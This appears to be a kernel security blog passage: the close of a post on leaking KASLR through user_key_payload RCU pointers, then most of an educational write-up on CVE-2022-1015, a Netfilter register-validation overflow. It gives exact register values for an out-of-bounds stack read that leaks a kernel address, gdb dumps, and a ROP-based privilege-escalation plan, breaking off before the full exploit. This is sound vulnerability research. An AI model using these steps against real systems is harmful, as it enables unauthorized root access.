It might be a little difficult to find OOB read primitives like this but they exist even if somewhat conditionally (those OOB reads could only be achieved if the previous conditions about the type of Use-After-Free are met). More on that later.

Ability to spray objects 
We need to be able to spray objects that have rcu_head as their first member. We must also be able to ‘update’ those objects.


  The objects that will be sprayed must be allocated with the same GFP flag as the primitive that is used for reading. Otherwise, they won’t be allocated in the same caches.


Analysis 
I will provide a simple (fake) example case and go over how the technique could be applied.

  For a real case where this technique is used: I have a write-up coming out soon of a vulnerability where I use this very trick to leak an address and bypass KASLR.


Let’s have a type vuln_obj
struct vuln_obj {
	uint64_t int1; // @0
	uint64_t int2; // @8
	uint64_t int3; // @16
	struct list_head list; // @24 - matches the requirement for the list_head 
	unsigned char data[16]; // @40
}

We can freely make calls to the kernel that will allocate this structure with the flag GFP_KERNEL. All objects of this type are allocated in kmalloc-64 and all objects of this type are in a linked list together. We can also make calls to free structures of this type. However, the kernel does not unlink the object that gets freed from the linked list.

This is our vulnerability: a vuln_obj object gets freed but it is not removed from the linked list and the previous and next objects in the list hold pointers to it. This causes a Use-After-Free and vuln_obj meets all the criteria we set prior.

Read Primitive 
Now that we have introduced our example vulnerable object we need to look for a read primitive that matches the conditions we set earlier.

A primitive like that won’t be found just laying around - we need to work a bit to get it. Our vuln_obj is allocated in kmalloc-64 so we are looking for objects that get allocated in that slab cache. In this example, we are going to be leveraging objects belonging to the in-kernel key management and retention facility and the message queue system of the kernel.

user_key_payload 
Objects of type user_key_payload hold the payload of user and logon keys. This type plays the main role in our story.
/* include/keys/user-type.h */
struct user_key_payload {
	struct rcu_head	rcu;		/* RCU destructor */ // @0 - 16 bytes
	unsigned short	datalen;	/* length of payload */ // @16 - 2 bytes
	char		data[] __aligned(__alignof__(u64)); /* actual payload */ // @24
};

struct callback_head {
	struct callback_head *next; // @0
	void (*func)(struct callback_head *head); // @8 rcu_head->func 
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

This object will be the one we will leak KASLR through (by reading the rcu->func pointer at offset 16 bytes).

posix_msg_tree_node 
In the message queue subsystem, all the messages (struct msg_msg) belonging to a certain queue are in a linked list together. The start (the root) of the queue is a struct posix_msg_tree_node.
struct posix_msg_tree_node {
    struct rb_node      rb_node; // of size 0x18 = 24 bytes
    struct list_head    msg_list; // @24 (is 16 bytes)
    int         priority; // @40
};

struct rb_node {
    unsigned long  __rb_parent_color;
    struct rb_node *rb_right;
    struct rb_node *rb_left;
} __attribute__((aligned(sizeof(long))));

It is allocated with the GFP_KERNEL flag and as such will be allocated in the same caches as our vuln_obj.

  However interestingly enough messages in the queue are allocated with the flag GFP_KERNEL_ACCOUNT and reside in the kmalloc-cg-n caches. So in our case msg_msg is not a viable primitive.


We do not possess direct control over objects of this type but we can freely allocate them by creating message queues.

  Technically the posix_msg_tree_node for each queue gets initiated whenever the first message is added to the queue and not when the queue is created.


Lets check how posix_msg_tree_node overlaps over vuln_obj
Obj: vuln_obj ; posix_msg_tree_node
@0:  int1     ; _rb_parent_color
@8:  int2     ; *rb_right
@16: int3     ; *rb_left
@24: list     ; msg_list 

Here posix_msg_tree_node is suitable as a primitive because the linked list msg_list aligns with vuln_obj.list (at offset 24 bytes).

If we manage to allocate posix_msg_tree_node in the same slab object where a vuln_obj used to reside we could influence the msg_list->*next and msg_list->*prev via the use-after-free (by initiating other vuln_obj objects).

msg_msg 
This structure holds messages belonging to the message queue system of the kernel.
/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list; // @0
	long m_type; // @16
	size_t m_ts;	// @24	/* message text size */
	struct msg_msgseg *next; // @32
	void *security; // @40
	/* the actual message follows immediately */
};

It is important to note:

  *security must always hold a valid address to heap memory
  The list_head of the linked list with all the messages in the queue is at the start of the object (in contrast to vuln_obj where it is at offset 24 bytes).


Frankensteining everything together 
Now that we have introduced the objects we need to frankenstein them together to achieve the OOB read we need to leak KASLR.

To achieve that we have to do the following:

  Make a call to allocate a vuln_obj object and free it (we shall call this Object 1).
  Allocate a posix_msg_tree_node of a queue at the UAF’d (Object 1) location.
  Initiate a new vuln_obj that gets UAF’d (Object 2). The address of vuln_obj.list will get written in posix_msg_tree_node.msg_list.next so the kernel will be fooled to believe that the first message in the message queue starts at vuln_obj.list. However vuln_obj.list is at an offset of 24 bytes while msg_msg.m_list is at an offset of 0 bytes from the start of the slab object. Therefore we can get 24 bytes of OOB read by reading the first message in the queue. (take a look at diagram for clarity)
  Allocate a user_key_payload where Object 2 used to be and pass valid heap addresses for m_list->next and m_list->prev (you need to have leaked a heap address for this - out of scope for this article but could be easily done in our example).
  Allocate a user_key_payload right under Object 2 (this is the payload object whose rcu->func we leak).
  Make a call to change the user_key_payload that is allocated under Object 2.
  Immediately make a call to fetch the first message in the message queue (with a bit of luck rcu->func() wouldn’t have been called yet).
  And we have the .text address - defeating KASLR.



  This is a simplification. In reality, to do this reliably you need to spray a ton of user_key_payload objects to get one right under Object 2. Then you need to mass edit all the payloads and then fetch the first message in the queue.



  We said prior that *security always needs to hold a valid heap address. We don’t have to worry about that as it will overlap with rcu_head->next.




Resources 
Some resources you might want to check out.


  What is RCU?
  mq_overview
  keyrings


Summary 
I provided an example which allows the use of this technique. The fake example is very close to the real application of the technique in my next vulnerability write-up (which should be coming out in the next week or two).

I believe the analysis and explanation are not too difficult to grasp but if you have questions feel free to reach out to me.

Keep an eye out for when the write-up drops if you are interested in the “real life” application.


CVE-2022-1015: A validation flaw in Netfilter leading to Local Privilege Escalation
2022-11-11T10:00:00+00:00
Introduction
Hello there! Today we will be reviewing and exploring a vulnerability in the Linux kernel framework Netfilter.

This is meant to be a write-up as much as it is meant to be educational material for the people just getting into the kernel vulnerability research space. I attempt to go over everything and not leave anything unexplained so it can be accessible to everyone - including those with little to no experience in vulnerability research. However, knowledge of Linux, assembly and C is implied.

I recommend reading my article Dissecting the Linux Firewall: Introduction to Netfilter’s nf_tables before undertaking this write-up so you have a general idea of the internals of nf_tables.

When I decided that I want to explore and review vulnerabilities in the Netfilter framework I came across David Bouman’s write-up of this very vulnerability. 
As the vulnerability proved quite interesting I decided to also do a write-up reviewing it in more detail as well as go through the process of developing the exploit for it more in-depth. My article can be quite similar to his at some times but also diverges greatly at others - namely in the exploitation stage.

The write-up is based on my notes that I was taking while exploring the vulnerability and trying to exploit it so there might be parts where I take the wrong way or talk about the things I missed or did incorrectly at first before figuring it out. I decided to leave those parts in the write-up as they can prove to be educational.

Table of Contents

  The Vulnerability
    
      Root cause
      Parser Functions
      Register translation
      Validation functions
      A big “but”
    
  
  Exploitation
    
      Primitives?
        
          nft_immediate_expr
          nft_payload
          nft_payload_set
          nft_bitwise
        
      
      An Exploitation strategy
      Leaking a kernel address
        
          nft_do_chain
          Scouting for a kernel address
          Leaking the address
        
      
      Road to Code Execution
        
          Output hook + UDP packet
          Trying the other hooks
          Exploitation vector through TCP
        
      
      Building an ROP chain
        
          prepare_kernel_cred
          commit_creds
          switch_task_namespaces
          swapgs_restore_regs_and_return_to_usermode
          Summarizing the ROP chain
        
      
    
  
  Proof-of-Concept
  Closing Remarks


The Vulnerability 
The vulnerability is in nf_tables portion of the netfilter framework. The exact description for CVE-2022-1015 is:

  A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue.


I will again recommend reading my article providing an introduction to nf_tables as it provides a good base to be able to understand the vulnerability.

Root cause 
The root cause of the vulnerability is in the functions nft_validate_register_store and nft_validate_register_load. They validate that register indexes and data that is to be written(stored) or read(loaded) is within bounds of the registers. 
However, before we take a look at them we will first take a look at the parsing functions - nft_parse_register_store and nft_parse_register_load which call the two validating functions.

Parser functions 
The parsing functions are responsible for parsing values from netlink attributes to register indexes and calling the validation functions.
/* net/netfilter/nf_tables_api.c */
int nft_parse_register_load(const struct nlattr *attr, u8 *sreg, u32 len)
{
	u32 reg; // 4 byte register variable
	int err;

	reg = nft_parse_register(attr); // gets the register index from an attribute
	err = nft_validate_register_load(reg, len); // calls the validating function
	if (err < 0) // if the validating function didn't return an error everything is fine
		return err;

	*sreg = reg; // save the register index into sreg (a pointer that is provided as an argument)
	// sreg = source register -> the register from which we read
	return 0;
}
EXPORT_SYMBOL_GPL(nft_parse_register_load);

int nft_parse_register_store(const struct nft_ctx *ctx,
			     const struct nlattr *attr, u8 *dreg,
			     const struct nft_data *data,
			     enum nft_data_types type, unsigned int len)
{
	int err;
	u32 reg; // 4 byte register variable

	reg = nft_parse_register(attr); // parsed from an attribute
	err = nft_validate_register_store(ctx, reg, data, type, len);
	/* here we pass a bit more arguments to the validating function */
	/* because we are going to be writing into the registers and not reading from them */
	if (err < 0)
		return err;

	*dreg = reg; // once again saves the register index into dreg
	// dreg = destination register -> the register in which we write
	return 0;
}


In the code above the reg variable is u32, 32-bit integer, while the sreg and dreg pointers are for u8 variables, so they are 8-bit. This of course makes sense if you know how the registers work. The total register space is 0x50 = 80 bytes. So there is no reason to save more than the least significant byte after validation - if the register index is in-bounds it should always fit in those 8-bits.

Register translation 
Now before we go into detail on the validation functions let’s first look at the register offsets and the enum type that we have. This section could be skipped if you have a really good understanding of how register offsets are handled and translated in netfilter. However, I recommend reading as it will be important later on.

So if you have read my article on nf_tables you should know that there are two types of register offsets for the data section of the registers. There used to be only four 16-byte registers. Then those registers turned into sixteen 4-byte ones. However, due to compatibility reasons, the 16-byte register offsets also stayed. So the registers can be viewed as a single buffer with two types of offsets.



enum nft_registers {
	NFT_REG_VERDICT,
	NFT_REG_1,
	NFT_REG_2,
	NFT_REG_3,
	NFT_REG_4,
	__NFT_REG_MAX,

	NFT_REG32_00	= 8,
	NFT_REG32_01,
	NFT_REG32_02,
	...
	NFT_REG32_13,
	NFT_REG32_14,
	NFT_REG32_15,
};

Taking a look at the enum type we can see how both types of offsets exist in it. NFT_REG_VERDICT points to zero and NFT_REG_1 to NFT_REG_4 point to indexes from one to four.
We see how NFT_REG32_00 is defined as eight so NFT_REG32_01 is nine and so on and so forth.

So now what happens is a translation in the nft_parse_register function.
/* net/netfilter/nf_tables_api.c */
/**
 *	nft_parse_register - parse a register value from a netlink attribute
 *
 *	@attr: netlink attribute
 *
 *	Parse and translate a register value from a netlink attribute.
 *	Registers used to be 128 bit wide, these register numbers will be
 *	mapped to the corresponding 32 bit register numbers.
 */
static unsigned int nft_parse_register(const struct nlattr *attr)
{
	unsigned int reg;

	// from include/uapi/linux/netfilter/nf_tables.h
	// NFT_REG_SIZE = 16 (16 bytes)
	// NFT_REG32_SIZE = 4 (4 bytes)
	reg = ntohl(nla_get_be32(attr));
	switch (reg) {
	case NFT_REG_VERDICT...NFT_REG_4:
		return reg * NFT_REG_SIZE / NFT_REG32_SIZE; 
	default:
		return reg + NFT_REG_SIZE / NFT_REG32_SIZE - NFT_REG32_00;
	}
}

If the register that is parsed through a netlink attribute is between the values NFT_REG_VERDICT...NFT_REG_4 (between the values zero and four) it does a calculation which returns the register index as reg * 16 / 4  or reg * 4.

So it just scales up the register index with a factor 4 if the old registers were used. That makes sense as the old registers were 16-byte ones and the new ones are 4-byte ones - so NFT_REG_2 corresponds to NFT_REG32_07 (not NFT_REG32_08 as the 4-byte register offsets start from 00).

This is when the old register offsets are used. However when the new register offsets are used - the 4-byte ones - another calculation is performed. That calculation is meant to align the number from the enum to the actual register index - because in the enum type the 4-byte register offsets are themselves offset by eight - NFT_REG32_00 maps to 8.

So the calculation yields that the true register index is reg + 16 / 4 - 8 which is reg - 4.

So the true register index of NFT_REG32_00 is actually 8-4 = 4. Why four you might ask? Well, there is a verdict register that sits at the beginning of the registers which is 16 bytes wide and that is the size of four 4-byte registers so the first data register starts actually from four and not zero.

Extremely confusing, I know - but this is what we deal with. Now we can take a look at the validation functions.

Validation functions 
We will take a look at only one of them as the vulnerability is the same in both.
/* net/netfilter/nf_tables_api.c */
int nft_validate_register_load(enum nft_registers reg, unsigned int len)
{
	if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
		/* NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE is 1 * 16 / 4 = 4
		/* this check is essentially reg < 4 */
		/* this essentially checks if you are reading the verdict */
		/* the verdict is located at reg offsets 0 to 4 */
		/* if attempting to load the verdict it returns an EINVAL */
		return -EINVAL;
	if (len == 0) // if trying to read with len = 0, return EINVAl - makes sense
		return -EINVAL;
	if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data))
		/* NFT_REG32_SIZE = 4 */
		/* sizeof_field(struct nft_regs, data) gets the size of the registers */
		/* the size of the registers in total is 0x50 = 80 */
		/* reg * 4 + len > 0x50 */ 
		/* This rule is to make sure we are not loading and storing */
		/* outside of the registers */
		/* going outside of the registers would be dangerous as */
		/* the registers are on the stack so reading or writing outside of them */
		/* would be directly writing out-of-bounds on the stack in **kernel-space** */
		/* if going OOB it returns an ERANGE error */
		return -ERANGE;
	
	return 0;
}

You might have spotted the vulnerability in the last if-statement.

if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data))

The constant NFT_REG32_SIZE is 4. If we pass a big enough value for reg such that when multiplied by 4 and len added we could overflow the integer. That would allow for very high values of reg to pass the check when they normally wouldn’t.

Let us look at an example. If we assume reg to be a 32-bit integer as it is in nft_parse_register_load then the maximum value we could pass for reg is 0xffffffff - four bytes of 0xff. With a such value of reg if we multiply it by four we would get a value of 0x3FFFFFFFC which is more than four bytes. In this case only the lower four bytes will be taken during the next computation.

Let’s say we have a value of len = 0x20 then at the end of the computation in the if-statement our value would be 0xfffffffc + 0x20 = 0x10000001C. Again that value is more than 4 bytes so only the lower four would be taken and that would leave the total value at the end at 0x1c. The check would evaluate to 0x1c < 0x50 which means that no error would be returned so the register value we pass (0xffffffff) would be validated as a valid one even though it is not.

If you remember in nft_parse_register_load and nft_parse_register_store in dreg and sreg is saved only the least significant bit (due to dreg and sreg being of type u8). So that means that at the end sreg or dreg would be just 0xff. That is still out of the bounds of nft_regs which is 0x50 bytes.

That would mean that we could potentially read and write out of the bounds of nft_regs directly on the stack.

Even though I just used 0xffffffff as an example value that at the end evaluates at 0xff - the highest value that could reach the validation function is 0xfffffffb due to how the registers are parsed. We took a look at that already but let’s go over it again.

In the enum type, the 16-byte registers hold values from 1 to 4. Everything higher than that is considered a 4-byte register and when those are evaluated 4 is subtracted from them to align them correctly. You might want to go back to that section to re-read it if something is unclear.

That means that if we pass 0xffffffff it would be decreased by 4 before it even reaches the validation function so reg by that point would be equal to 0xfffffffb. As only the lowest byte of that would be taken for the actual register value - the register we will have is 0xfb. That is true for all register values that we pass higher than 4. This would mean that the highest register index we can get is 0xfb.

However, there is a way to reach the register values from 0xfc to 0xff. Until now we used the base 0xffffffXX for the register values we pass but we could also use 0x3fffffXX and 0x7fffffXX. If we use a lower base - for example, 0x3fffffXX - we could pass a value like 0x40000003 that when decreased by 4 will be equal to 0x3fffffff. When the least-significant byte is taken it evaluates to register index 0xff. That’s how we reach the highest register indexes.


  In all future mentions of register indexes -> the register index refers to the REAL index (after they are decreased by 4).


A big “but” 
But all of that is under the assumption that the register that reaches the validation function is indeed 32bit. And that might not be true. The parameter of the function is of type enum nft_registers. By default, enum should be guaranteed to hold integer values(32bit). However, an optimization might be active that makes the size of the enums big enough to only hold the values provided in the definition of the enum. If that optimization is active that would mean our enum nft_registers would be of size char (1 byte). In that case, only the least-significant byte would reach the faulty validation - complicating things.

There is no information showing if that optimization is active by default in the kernel.
So the only way to say is to look at the assembly of the validation function. Let’s do that.
; nft_parse_register_load - kernel built from source at tag 5.12
0xffffffff81a6c870 <+0>:	call   0xffffffff81065160 <__fentry__>
0xffffffff81a6c875 <+5>:	mov    eax,DWORD PTR [rdi+0x4]
0xffffffff81a6c878 <+8>:	bswap  eax
0xffffffff81a6c87a <+10>:	mov    edi,eax
0xffffffff81a6c87c <+12>:	lea    ecx,[rax-0x4]
0xffffffff81a6c87f <+15>:	shl    edi,0x4
0xffffffff81a6c882 <+18>:	shr    edi,0x2
0xffffffff81a6c885 <+21>:	cmp    eax,0x4
0xffffffff81a6c888 <+24>:	mov    eax,edi
0xffffffff81a6c88a <+26>:	cmova  eax,ecx
0xffffffff81a6c88d <+29>:	test   edx,edx
0xffffffff81a6c88f <+31>:	je     0xffffffff81a6c8a3 
0xffffffff81a6c891 <+33>:	cmp    eax,0x3
0xffffffff81a6c894 <+36>:	jbe    0xffffffff81a6c8a3 
0xffffffff81a6c896 <+38>:	lea    edx,[rdx+rax*4]
0xffffffff81a6c899 <+41>:	cmp    edx,0x50
0xffffffff81a6c89c <+44>:	ja     0xffffffff81a6c8a9 
0xffffffff81a6c89e <+46>:	mov    BYTE PTR [rsi],al
0xffffffff81a6c8a0 <+48>:	xor    eax,eax
0xffffffff81a6c8a2 <+50>:	ret    
0xffffffff81a6c8a3 <+51>:	mov    eax,0xffffffea
0xffffffff81a6c8a8 <+56>:	ret    
0xffffffff81a6c8a9 <+57>:	mov    eax,0xffffffde
0xffffffff81a6c8ae <+62>:	ret    

If we take a look at <+38> and the few instructions below we can see that this is the generated assembly of the vulnerable if-statement.

We can see that in my case the nft register index is in the rdx register. We can see that the full rdx register is used in the calculation and the result is saved into the lower 32 bits (edx). Then edx is compared to 0x50. This clearly shows that the register size in the function is not shrunk by enum optimization.

Exploitation 
Now that it is clear that no optimization is in our way we can take a look at how we could potentially exploit this.

In order to be able to exploit this we would need to be able to create and modify nf_tables objects - tables, chains, etc. To do that we need the capability CAP_NET_ADMIN. Thankfully we can obtain it in a user+network namespace. We will just have to make sure to leave the namespace during exploitation.

This vulnerability is essentially an incorrect validation. This allows us to set values for the registers such that we are going to be accessing addresses on the stack outside of nft_regs. Allowing Out-Of-Bounds Read and Write which can lead to an Arbitrary Code Execution in kernel-space.

Primitives? 
It is time to look into what our primitives are. All the expressions use the registers in some way - either by reading from them or writing to them. Now the question is about looking for the ones most useful to help us exploit this vulnerability.

nft_immediate_expr 
This one writes constant data to the registers. So on theory it could be used if we want to use it for an OOB write.

However with this expression we can only write up to 16 bytes which is not ideal and that constraint of 16 bytes would also restrict us severely on the values the register value we pass could hold.

The minimal value we could pass for the register that it still goes through the validation successfully is 0xfffffffc which is very restrictive.

nft_payload 
The nft_payload expression is used to copy directly from the packet to the registers. This is a perfect expression for an OOB read. We can read up to 0xff at once which is the most we can get from any expression. Let’s find out our lower and upper bounds.

Our lower bound is whenever we max out our len at 0xff. The minimal register value then we can have to pass the validation condition is 0xffffffc1. That means the lowest offset we can read at is 0xc1 * 4 = 0x304 relative to the beginning of nft_regs on the stack.

Our upper bound is when our register value is the highest possible 0xff. At that register value, the highest length we could have is 0x54 at which 0x3fffffff * 4 + 0x54 = 0x50 <= 0x50. This means that the highest offset we can read at is 0xff * 4 + 0x54 = 0x450.

So the lowest offset at which we could read is 0x304 and the highest at which we could read is 0x450. That leaves us with 0x14c = 332 bytes we can read from the stack.

nft_payload_set 
The nft_payload_set does the opposite of the nft_payload. Instead of copying from the packet to the registers - this expression can be used to copy from the registers and write onto the packet. It has the same bounds as nft_payload.
struct nft_payload_set {
	enum nft_payload_bases	base:8;
	u8			offset;
	u8			len;
	u8			sreg;
	u8			csum_type;
	u8			csum_offset;
	u8			csum_flags;
};

The thing different is that it takes a source register sreg instead of a destination register dreg. It also has some checksum options but they are not relevant to us.

nft_bitwise 
This expression is used to perform bitwise operations on the registers.
struct nft_bitwise {
	u8			sreg;
	u8			dreg;
	enum nft_bitwise_ops	op:8;
	u8			len;
	struct nft_data		mask;
	struct nft_data		xor;
	struct nft_data		data;
};

It takes a sreg and len which specify to what registers we are going to be performing the bitwise operations. The destination dreg specifies where we are going to be putting the data from the registers we are performing the bitwise operation to.

The op parameter of type nft_bitwise_ops specifies the type of a bitwise operation.	You can read all about the types in my article on nf_tables but here we will review only the one that concerns us.

We will be using this expression to copy from register to register without performing any bitwise operation. We are going to use it in case we need to copy some data from out-of-bounds ‘registers’ to the actual registers. To do this we are going to use either ops set to NFT_BITWISE_LSHIFT or NFT_BITWISE_RSHIFT and pass a zero as the data (here the data is the amount of byte we shift by).

What are our bounds when we use this expression?

Here the boundaries are a bit different. Our max length cannot be 0xff because if it is then both our sreg and dreg would be out-of-bounds which we don’t want. So our length must be 0x40 = 64 at the maximum (16 data registers each 4 bytes).

Our lower bound would then be when we barely cross the threshold of validity but our len is the maximum we could have - 0x40. This means that our lower bound would be when our register value is 0xfffffff0 - because 0xfffffff0 * 4 + 0x40 = 0x00 < 0x50. Converted to byte offset that would be 0xf0 * 4 = 0x3c0 relative to the beginning of nft_regs.

Our upper bound would be when we have set our length to the maximum - 0x40. The highest value for a register we can have is 0xff. In that case 0x3fffffff * 4 + 0x40 = 0x3c < 0x50. Coverted to a byte offset that is 0xff * 4 + 0x40 = 0x43c.

So in total we could read from offset 0x3c0 to offset 0x43c with this expression - 0x7c = 124 bytes range.

Those are all of the expressions needed to exploit this vulnerability.

An Exploitation strategy 
The exploitation strategy is pretty simple. The netfilter hook we use for our chain and the protocols we choose for the packets going through the firewall all change the stack layout. This means that if the stack layout is not favourable at our OOB read and write range we can experiment a lot with hooks and protocols until we have a favourable stack layout to do what we need to do. So our strategy is essentially:

  Find a good hook and protocol such that there is a kernel address in our OOB read range.
  Leak the address and calculate the kernel base.
  Find a good hook and protocol such that the stack layout at our OOB write range is good enough for us to be able to inject a full ROP chain on the stack.
  Build an ROP chain and inject it… voilà.


Leaking a kernel address 
The first stage of exploitation is to find a way to leak a kernel address to find the kernel base. It is essential that we find the kernel base address in order to actually exploit the vulnerability. Due to “Kernel Address Space Layout Randomization” (KASLR) the kernel is loaded at a different address in memory each time (at boot). In order to use an ROP chain we need to know the base address to calculate the addresses the ROP gadgets will be located at. Thankfully due to the fact that we have an OOB read we have a very good chance of leaking a kernel address and defeating KALSR.

nft_do_chain 
If you have read the article on nf_tables you know that nft_do_chain is executed to go through the rules in a chain and execute their expressions whenever a hook is ‘triggered’.

Looking at the generated assembly of nft_do_chain we need to locate instructions accessing the registers to determine where on the stack the registers are.
0xffffffff81a6bb40 <+0>:     call   0xffffffff81065160 <__fentry__>
0xffffffff81a6bb45 <+5>:     push   rbp
0xffffffff81a6bb46 <+6>:     mov    rbp,rsp
0xffffffff81a6bb49 <+9>:     push   r15
0xffffffff81a6bb4b <+11>:    mov    r15,rdi
0xffffffff81a6bb4e <+14>:    push   r14
0xffffffff81a6bb50 <+16>:    push   r13
0xffffffff81a6bb52 <+18>:    push   r12
0xffffffff81a6bb54 <+20>:    push   rbx
0xffffffff81a6bb55 <+21>:    and    rsp,0xfffffffffffffff0
0xffffffff81a6bb59 <+25>:    sub    rsp,0x1a0
0xffffffff81a6bb60 <+32>:    mov    rax,QWORD PTR [rdi+0x20]
0xffffffff81a6bb64 <+36>:    mov    QWORD PTR [rsp+0x8],rsi
0xffffffff81a6bb69 <+41>:    mov    rax,QWORD PTR [rax+0x20]
0xffffffff81a6bb6d <+45>:    mov    BYTE PTR [rsp+0x4d],0x0
0xffffffff81a6bb72 <+50>:    movzx  eax,BYTE PTR [rax+0xe94]
0xffffffff81a6bb79 <+57>:    mov    BYTE PTR [rsp+0x13],al
0xffffffff81a6bb7d <+61>:    nop    DWORD PTR [rax+rax*1+0x0]
0xffffffff81a6bb82 <+66>:    mov    rax,QWORD PTR [rsp+0x8]
0xffffffff81a6bb87 <+71>:    mov    DWORD PTR [rsp+0x14],0x0
0xffffffff81a6bb8f <+79>:    mov    QWORD PTR [rsp+0x18],rax
0xffffffff81a6bb94 <+84>:    cmp    BYTE PTR [rsp+0x13],0x0
0xffffffff81a6bb99 <+89>:    mov    rax,QWORD PTR [rsp+0x18]
0xffffffff81a6bb9e <+94>:    je     0xffffffff81a6be90 
0xffffffff81a6bba4 <+100>:   mov    r12,QWORD PTR [rax+0x8]
0xffffffff81a6bba8 <+104>:   mov    rax,QWORD PTR [r12]
0xffffffff81a6bbac <+108>:   mov    DWORD PTR [rsp+0x50],0xffffffff ; regs.verdict.code = NFT_CONTINUE;  
0xffffffff81a6bbb4 <+116>:   mov    rbx,QWORD PTR [r12]
0xffffffff81a6bbb8 <+120>:   test   rbx,rbx
...
0xffffffff81a6bc93 <+339>:   mov    r8d,DWORD PTR [rsp+0x50]
0xffffffff81a6bc98 <+344>:   cmp    r8d,0xffffffff
0xffffffff81a6bc9c <+348>:   jne    0xffffffff81a6c039  
...

The instruction of importance is at <+108>. Let’s take a deeper look at it.

At the beginning of do_chain in nft_do_chain there is this line of code
regs.verdict.code = NFT_CONTINUE;

You probably know that NFT_CONTINUE is the default verdict code.
enum nft_verdicts {
	NFT_CONTINUE	= -1, // -1 is 0xffffffff due to Two's Complement
	NFT_BREAK	= -2,
	NFT_JUMP	= -3,
	NFT_GOTO	= -4,
	NFT_RETURN	= -5,
};

So this instruction at <+108> sets the verdict register to NFT_CONTINUE.

The verdict register is the first register - sitting at the very start. If it is located at rsp+0x50. 
That means that the register occupies the space on the stack from rsp+0x50 to rsp+0xa0.

Also looking at the instructions at <+339> and <+344> we can see the check validating that the verdict is still NFT_CONTINUE.

gdb-peda$ x/20xw ($rsp+0x50) // printing the registers -> we print 20 words (20 (4 byte) words is 80 bytes = 0x50)
0xffffc90000003c50:     0xffffffff      0x00000000      0x00000000      0x00000000
0xffffc90000003c60:     0x00000011      0xffffffff      0x8105ceac      0xffffffff
0xffffc90000003c70:     0x8117f965      0xffffffff      0xffffffff      0x7fffffff
0xffffc90000003c80:     0x00000006      0x00000000      0x3a61cec0      0xffff8880
0xffffc90000003c90:     0x00000001      0x00000000      0x00011795      0x00000000


Now we know where on the stack the nft_regs are located.

Scouting for a kernel address 
We already have established that we can do an OOB read and write with nft_bitwise. Using this expression will allow us to copy data from the OOB range and put it into our registers. Then we could use a nft_payload_set to get the data we saved into the registers and put it into a packet. Once it is in the packet we can listen for it - and read the leaked data.


  A small note: It is not necessary to use both nft_bitwise and nft_payload_set. You could just use nft_payload_set to directly copy it from the OOB range into the packet. However, when I was writing the exploit I chose to use first nft_bitwise and then nft_payload_set.


We know that with nft_bitwise we can leak from offset 0x3c0 to offset 0x43c - that’s 15 and a half 8-byte words range.

Now let’s take a look at the stack layout when we set up a chain with an output hook (NF_INET_LOCAL_OUT) and use a UDP packet. Using an output hook means that the rules and expressions we set will be executed right before the packet leaves the nest. We will use a UDP packet as it is the most simple one and a one-off - doesn’t need a connection like a TCP one.

gdb-peda$ x/16gx ($rsp+0x50+0x3c8)
0xffffc90000227d78:     0x0000000000000008      0xffff8880052dd680
0xffffc90000227d88:     0x0000000000000004      0x0000000000000000
0xffffc90000227d98:     0xffffffff819bfc63      0xffff88800e1db180
0xffffc90000227da8:     0xdd4d4cb9a478c900      0xffff88800e1db180
0xffffc90000227db8:     0xffffc90000227df8      0xffff88800e1db180
0xffffc90000227dc8:     0x0000000000000010      0x0000000000000004
0xffffc90000227dd8:     0x0000000000000000      0xffffc90000227e28
0xffffc90000227de8:     0xffffffff819b7ab7      0xffffffff819b7ab7

The address saved at 0xffffc90000227d98 immediately stands out as it is obviously a .text address. This serves us perfectly. It is at offset 0x3e8 relative to the beginning of nft_regs.

Leaking the address 

Leaking the address is straightforward now. We have a .text address ready to be leaked in our OOB read range when we use an output hook and send a UDP packet to ourselves on the loopback interface. Now we need to construct a rule with the proper expressions. First, we copy the address from the OOB range to the registers. Then we need to copy the address from the registers and write it to the UDP packet’s payload. And finally, we just need to be listening for UDP packets so we can receive back the packet carrying the address.

To do that we need to make a rule with the following expressions:

  bitwise expression
    
      sreg = 0xffffff(fe) (0x3e8 / 4 = 0xfa but it will be decreased by 4 so we will add 4 preemptively 0xfa + 4 = 0xfe)
      dreg = NFT_REG32_01
      len = 0x20 (length is bigger than needed to pass the validation)
      bitwise_shift_type = NFT_BITWISE_RSHIFT or NFT_BITWISE_LSHIFT
      data = 0 (shift value must be 0)
    
  
  payload_set expression
    
      sreg = NFT_REG32_01
      base = NFT_PAYLOAD_TRANSPORT_HEADER (this base is targetting the UDP header)
      offset = 8 (the UDP header is 8 bytes, we want to be writing right after it - where the payload is)
      len = 8 (the address is 8 bytes)
    
  


Those expressions make a rule that is added to the output chain. 
For the sake of reducing noise, I also added an expression of type nft_cmp_expr at the beginning of the rule to check the destination port before performing the other expressions. That would make sure we are not writing to some other UDP packet.

After we have set up the rule the only thing left is to spin up a UDP listener and send a UDP packet with an 8-byte payload - the address is going to be written over the 8-byte payload. Then we receive the packet and read the address from it.

Now that we have defeated KASLR it is time we move towards our goal - gaining kernel-space code execution and achieving Local Privilege Escalation.

Road to Code Execution 
Now that we have figured out how to leak the kernel address we need to figure out how to achieve Arbitrary Code Execution.

When we talked about primitives we established that nft_payload is the best expression for OOB write as we can write up to 0xff bytes - 32 eight-byte words.

Ideally, we want to be able to write at least 20-something words on the stack without crashing. In reality, this is a bit more difficult than it seems.

Output hook + UDP packet 
Let us look more closely at the stack layout when using an output chain and a UDP packet. We found a .text address at a nice location there so maybe if it is a saved return address we could inject an ROP chain at that location.

gdb-peda$ x/40gx ($rsp+0x50+0x308)
0xffffc90000227cb8:     0x0000000000000000      0x0000000000000000
0xffffc90000227cc8:     0x0000000000000000      0x000000000100007f
0xffffc90000227cd8:     0x0000000000000000      0x00000000ffff0000
0xffffc90000227ce8:     0x0000000000000000      0x0000000100000001
0xffffc90000227cf8:     0x0011000000000000      0x0000000000000001
0xffffc90000227d08:     0x0000000000000000      0x0000000000000000
0xffffc90000227d18:     0x0100007f0100007f      0xffff8880699c55c3
0xffffc90000227d28:     0x0000000000000000      0x0000000000000000
0xffffc90000227d38:     0x000000100000ffff      0x0000000000000000
0xffffc90000227d48:     0x00008800ffff0000      0x0000000000000000
0xffffc90000227d58:     0x0000ee4700000000      0x0000000000000000
0xffffc90000227d68:     0xffff8880052d0480      0xffff8880052d0508
